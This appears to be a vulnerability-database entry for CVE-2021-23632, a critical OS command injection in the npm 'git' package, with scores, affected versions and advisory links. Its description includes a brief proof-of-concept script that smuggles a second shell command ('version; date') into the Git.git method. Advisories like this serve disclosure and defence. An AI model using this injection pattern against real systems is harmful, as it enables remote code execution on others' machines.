CVE-2021-23632 — OS Command Injection in GIT

CWE-78 — OS Command Injection CWE-94 — Code Injection4 documents4 sources

Severity

9.8CRITICALNVD

CNA6.6

EPSS

3.4%

top 12.57%

CISA KEV

Not in KEV

Exploit

No known exploits

Affected products

GIT GIT Project GIT

Timeline

PublishedMar 17

Latest updateMar 18

Description

All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install …

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HExploitability: 3.9 | Impact: 5.9

Affected Packages4 packages

▶CVEListV5git/git< unspecified

▶CVEListV5git_project/git< unspecified

▶npmgit/git0.1.5

▶NVDgit_project/git0.1.5

🔴Vulnerability Details

OSV

Code injection in npm git↗2022-03-18

▶

GHSA

Code injection in npm git↗2022-03-18

▶

CVEList

Remote Code Execution (RCE)↗2022-03-17

▶